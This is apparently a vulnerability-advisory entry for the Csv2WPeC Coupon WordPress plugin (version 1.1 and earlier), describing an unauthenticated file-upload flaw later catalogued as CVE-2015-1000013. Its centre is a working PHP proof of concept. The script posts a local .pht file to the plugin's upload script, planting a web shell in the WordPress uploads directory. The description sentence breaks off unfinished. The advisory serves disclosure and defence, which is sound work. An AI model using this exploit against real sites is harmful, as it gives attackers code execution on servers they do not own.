Lucene search
Larry W. CashdollarWPEX-ID:0D37BAF3-0884-4E3C-9853-1F4C42A409A3HistorySep 14, 2015 - 12:00 a.m.
Csv2WPeC Coupon <= 1.1 - Unauthenticated Remote File Upload
2015-09-1400:00:00
Larry W. Cashdollar
10
0.003 Low
EPSS
Percentile
65.6%
The code in csv2wpecCoupon_FileUpload.php does not properly sanitize user input, it checks the file mime-type for type x-php but this can be tricked when using the short code for
<?php
echo "Running PoC against target site<br>";
$uploadfile="/var/www/s.pht";
$ch =
curl_init("http://192.168.0.47/wp-content/plugins/csv2wpec-coupon/csv2wpecCoupon_FileUpload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('UPLOAD_DIR'=>'/usr/share/wordpress/wp-content/uploads/','OP_TYPE'=>'shell','DATA_KEY'=>1,'shell_file'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'s.pht'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>References
Related
nvd
nvd
CVE-2015-1000013
2016-10-06 14:59:14
cvelist
cvelist
CVE-2015-1000013
2016-10-06 14:00:00
cve
cve
CVE-2015-1000013
2016-10-06 14:59:14
prion
prion
Design/Logic Flaw
2016-10-06 14:59:00
wpvulndb
wpvulndb
Csv2WPeC Coupon <= 1.1 - Unauthenticated Remote File Upload
2015-09-14 00:00:00